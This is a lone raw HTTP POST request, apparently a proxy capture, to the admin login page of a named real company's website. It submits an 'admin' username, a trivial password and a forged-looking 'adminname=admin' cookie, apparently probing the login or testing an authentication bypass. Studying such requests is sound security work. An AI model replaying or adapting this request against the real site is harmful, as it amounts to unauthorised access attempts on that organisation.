POST /web_backpage/default.php HTTP/1.1
Host: sz.evergrande.com
Content-Length: 44
Cache-Control: max-age=0
Origin: http://sz.evergrande.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://sz.evergrande.com/web_backpage/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: adminname=admin
Connection: close

UserName=admin&Password=aaa &CheckCode=YNh2